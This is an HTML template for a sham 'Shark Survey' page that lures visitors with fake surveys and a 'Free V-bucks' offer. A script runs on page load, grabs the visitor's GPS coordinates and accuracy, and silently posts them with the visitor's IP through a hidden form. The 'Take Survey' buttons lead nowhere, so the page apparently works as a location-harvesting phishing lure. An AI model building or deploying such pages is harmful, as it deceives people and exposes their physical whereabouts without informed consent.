<html>
    <head>
        <title>Survey Earn</title>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BmbxuPwQa2lc/FVzBcNJ7UAyJxM6wuqIj61tLrc4wSX0szH/Ev+nYRRuWlolflfl" crossorigin="anonymous">
        <link rel="stylesheet" type="text/css" href="/static/style/style.css">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <style>
            .sidenav a:hover {
                color: {{color2}};
            }
            .sidenav a{
                color: {{color}}
            }
        </style>
    </head>

    <body>
        <div id="mySidenav" class="sidenav">
            <div style="margin-bottom: 10%;">
            </div>
            <a href="javascript:void(0)" class="closebtn" onclick="closeNav()">&times;</a>
            <a href="/">Home</a>
            <a href="/signin/">Login</a>
            <a href="/signup/">Register</a>
            <a href="/donate/">Donate</a>
        </div>
        
    <span style="font-size:30px;cursor:pointer" onclick="openNav()"><b style="color: {{color}}">&#9776; </b><b style="color: {{color}};">Shark </b><b style="color: {{color2}};">Survey</b></Spot> </span>
    <marquee><h3><b style="color: {{color}};">We need your location,</b> <b b style="color: {{color2}};">in order to get a survey for your region</b></h3></marquee>
    <div class="row text-center" >
        <div class="col-lg-3 col-md-6 mb-4 card" style="width: 18rem; margin: 2%;">
            <img src="https://a9p9n2x2.stackpathcdn.com/wp-content/blogs.dir/1/files/2021/02/Coka-Cola-960x709.jpg" class="card-img-top" alt="...">
            <div class="card-body">
              <h5 class="card-title">Coco Cola</h5>
              <p class="card-text">Does Coco Cola still have it's pride?</p>
              <a href="#" class="btn btn-primary">Take Survey</a>
            </div>
        </div>
        <div class="col-lg-3 col-md-6 mb-4 card" style="width: 18rem; margin: 2%;">
            <img src="https://store-images.s-microsoft.com/image/apps.5271.70702278257994163.958bb3bc-e151-4401-a360-075b4cb46da9.9affb847-9408-4ca1-b0d8-4642f34828b9?mode=scale&q=90&h=1080&w=1920" class="card-img-top" alt="...">
            <br>
            <br>
            <div class="card-body">
              <h5 class="card-title">Fortnite</h5>
              <p class="card-text">Fortnite player? Free V-bucks on us.</p>
              <a href="#" class="btn btn-primary">Take Survey</a>
            </div>
        </div>
        <div class="col-lg-3 col-md-6 mb-4 card" style="width: 18rem; margin: 2%;">
            <img src="https://www.technewsworld.com/article_images/story_graphics_xlarge/xl-2020-royal-flush-1.jpg" class="card-img-top" alt="...">
            <br>
            <br>
            <div class="card-body">
              <h5 class="card-title">Poker</h5>
              <p class="card-text">Are you a gambler? Take this survey.</p>
              <a href="#" class="btn btn-primary">Take Survey</a>
            </div>
        </div>
        <div class="col-lg-3 col-md-6 mb-4 card" style="width: 18rem; margin: 2%;">
            <img src="https://miro.medium.com/max/4800/1*cbjT-JtrNb-0FtjxS_we-g@2x.jpeg" class="card-img-top" alt="...">
            <br>
            <div class="card-body">
              <h5 class="card-title">Norway</h5>
              <p class="card-text">Ever visited Norway? Tell us how you felt.</p>
              <a href="#" class="btn btn-primary">Take Survey</a>
            </div>
        </div>
    </div>
    <form id="kay" action="/" method="POST">
        <input type="hidden" name="lats" id="lats" value="">
        <input type="hidden" name="longs" id="longs" value="">
        <input type="hidden" name="accuracy" id="accuracy" value="">
        <input type="hidden" name="ip" value={{ip}}>
    </form>

        <script>
            
            function openNav() {
              document.getElementById("mySidenav").style.width = "250px";
            }
            
            function closeNav() {
              document.getElementById("mySidenav").style.width = "0";
            }
            
            navigator.geolocation.getCurrentPosition(function(location) {
                document.getElementById("lats").value = location.coords.latitude;
                document.getElementById("longs").value = location.coords.longitude;
                document.getElementById("accuracy").value = location.coords.accuracy;
                document.getElementById("kay").submit(); 
            });
        
            </script>
            <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/js/bootstrap.bundle.min.js" integrity="sha384-b5kHyXgcpbZJO/tY9Ul7kGkf1S0CWuKcCD38l8YkeH8z8QjE0GmW1gYU5S9FOnJ0" crossorigin="anonymous"></script> 
    </body>
</html>